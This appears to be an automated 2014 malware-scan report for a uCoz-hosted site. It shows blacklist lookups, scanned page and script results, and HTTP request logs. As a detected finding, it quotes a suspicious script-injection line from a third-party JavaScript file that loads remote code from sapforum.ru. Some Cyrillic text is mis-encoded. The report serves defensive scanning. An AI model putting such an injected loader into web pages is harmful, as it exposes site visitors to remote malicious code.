Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=intrabotka.ucoz.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://intrabotka.ucoz.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://intrabotka.ucoz.ru/ | 200 OK Content-Length: 52054 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ucodes.ru ...[6317 bytes skipped]... rder="0"></td></tr> <tr><td height="39" style="background: url('/.s/t/241/4.jpg') no-repeat left;" colspan="2" align="right"><img src="/.s/t/241/5.gif" border="0" align="absmiddle"><a href="http://intrabotka.ucoz.ru/"><!--<s5176>-->ÐлавнаÑ<!--</s>--></a> <img src="/.s/t/241/5.gif" border="0" align="absmiddle"><script type="text/javascript" src="http://ucodes.ru/js/unetReg.js"></script> <a href="javascript:reg.init();"><!--<s3089>-->РегиÑÑÑаÑиÑ<!--</s>--></a> <img src="/.s/t/241/5.gif" border="0" align="absmiddle"><a href="javascript://" rel="nofollow" onclick="new _uWnd('LF',' ',-250,-110,{autosize:0,closeonesc:1,resize:1},{url:'/index/40'});return false;"><!--<s3087>-->ÐÑ Ð¾Ð´<!--</s>--></a><img src="/.s/t/241/5.gif" border="0" align="absm ...[54032 bytes skipped]... | ||
https://www.forex4you.org/flash/partners/js/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://intrabotka.ucoz.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://intrabotka.ucoz.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://s33.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s33.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 39848 Content-Type: text/javascript | clean |
http://s33.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228798 Content-Type: text/javascript | clean |
http://ucodes.ru/js/unetReg.js | 200 OK Content-Length: 17374 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.sapforum.ru/gb/tmznpm7r.php?id=2786771"></script>'); | ||
http://intrabotka.ucoz.ru/about:blank | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://traders-union.ru/upload_files/js/AC_RunActiveContent.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 01 Jun 2014 23:09:11 GMT Location: /js/AC_RunActiveContent.js Server: nginx Content-Type: text/html X-Frame-Options: DENY X-Powered-By: PHP/5.4.28-1+deb.sury.org~precise+1 X-XSS-Protection: 1; mode=block | clean |
http://traders-union.ru/js/ac_runactivecontent.js | 404 Not Found Content-Length: 32911 Content-Type: text/html | clean |
http://traders-union.ru//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js/ | 404 Not Found Content-Length: 33043 Content-Type: text/html | clean |
http://traders-union.ru//vk.com/js/api/openapi.js?95/ | 404 Not Found Content-Length: 32927 Content-Type: text/html | clean |
http://traders-union.ru/min/?f=/js/jquery.alerts.js,/js/jquery.flash.js,/js/jquery.fancybox.js,/js/jquery.bubble.popup.min.js,/js/jquery.dataTables.min.js,/js/jquery.selectBox.js,/js/ZeroClipboard.js,/js/jquery.jcarousel.min.js,/js/jquery.lazyload.js,/js/player/jwplayer.js,/js/jquery-ui.js,/js/widget.js,/js/scripts.js | 200 OK Content-Length: 300724 Content-Type: application/x-javascript | clean |
http://traders-union.ru/ | 200 OK Content-Length: 47606 Content-Type: text/html | clean |
http://traders-union.ru/page/o_nas/ | 200 OK Content-Length: 37500 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: intrabotka.ucoz.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 01 Jun 2014 23:09:08 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 0intrabotkauCoz=; path=/; expires=Fri, 01-Jun-2012 23:09:07 GMT; domain=.intrabotka.ucoz.ru;
Set-Cookie: 0intrabotkauzll=1401664147; path=/; expires=Mon, 01-Jun-2015 23:09:07 GMT; domain=.intrabotka.ucoz.ru;
Set-Cookie: ucvid=uq6nw4AqDD; domain=ucoz.ru; path=/; expires=Mon, 01-Jun-2015 23:09:07 GMT
GET / HTTP/1.1
Host: intrabotka.ucoz.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 01 Jun 2014 23:09:08 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 0intrabotkauCoz=; path=/; expires=Fri, 01-Jun-2012 23:09:07 GMT; domain=.intrabotka.ucoz.ru;
Set-Cookie: 0intrabotkauzll=1401664147; path=/; expires=Mon, 01-Jun-2015 23:09:07 GMT; domain=.intrabotka.ucoz.ru;
Set-Cookie: ucvid=uq6nw4AqDD; domain=ucoz.ru; path=/; expires=Mon, 01-Jun-2015 23:09:07 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: intrabotka.ucoz.ru
Referer: http://www.google.com/search?q=intrabotka.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: intrabotka.ucoz.ru
Referer: http://www.google.com/search?q=intrabotka.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.